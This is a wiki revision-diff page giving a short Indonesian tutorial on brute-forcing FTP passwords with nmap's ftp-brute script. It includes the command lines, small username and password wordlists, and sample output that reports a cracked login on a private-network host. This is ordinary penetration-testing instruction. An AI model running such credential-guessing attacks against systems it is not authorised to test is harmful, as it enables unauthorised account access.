Difference between revisions of "Nmap: brute force hack ftp password"

From OnnoWiki
Jump to navigation Jump to search
 
(One intermediate revision by the same user not shown)
Line 24: Line 24:
 
  nmap -p21 –script ftp-brute.nse –script-args \
 
  nmap -p21 –script ftp-brute.nse –script-args \
 
   userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105
 
   userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105
 +
 +
nmap -p21 –script ftp-brute.nse –script-args \
 +
  userdb=user.txt,passdb=pass.txt 192.168.3.47
 +
 +
Contoh Output
 +
 +
Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-03 10:32 WIB
 +
Nmap scan report for 192.168.3.47
 +
Host is up (0.00040s latency).
 +
 +
PORT  STATE SERVICE
 +
21/tcp open  ftp
 +
| ftp-brute:
 +
|  Accounts:
 +
|    onno:123456 - Valid credentials
 +
|_  Statistics: Performed 15 guesses in 6 seconds, average tps: 2.5
 +
 +
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

Latest revision as of 10:33, 3 November 2022

Script types: portrule
Categories: intrusive, brute
Download: https://svn.nmap.org/nmap/scripts/ftp-brute.nse

isi

user.txt
admin
root
onno
dll

isi

pass.txt
123456789
123456
12345
dll
nmap -p21 –script ftp-brute.nse –script-args \
  userdb=/root/user.txt,passdb=/root/pass.txt 192.168.1.105
nmap -p21 –script ftp-brute.nse –script-args \
  userdb=user.txt,passdb=pass.txt 192.168.3.47

Contoh Output

Starting Nmap 7.80 ( https://nmap.org ) at 2022-11-03 10:32 WIB
Nmap scan report for 192.168.3.47
Host is up (0.00040s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-brute: 
|   Accounts: 
|     onno:123456 - Valid credentials
|_  Statistics: Performed 15 guesses in 6 seconds, average tps: 2.5

Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds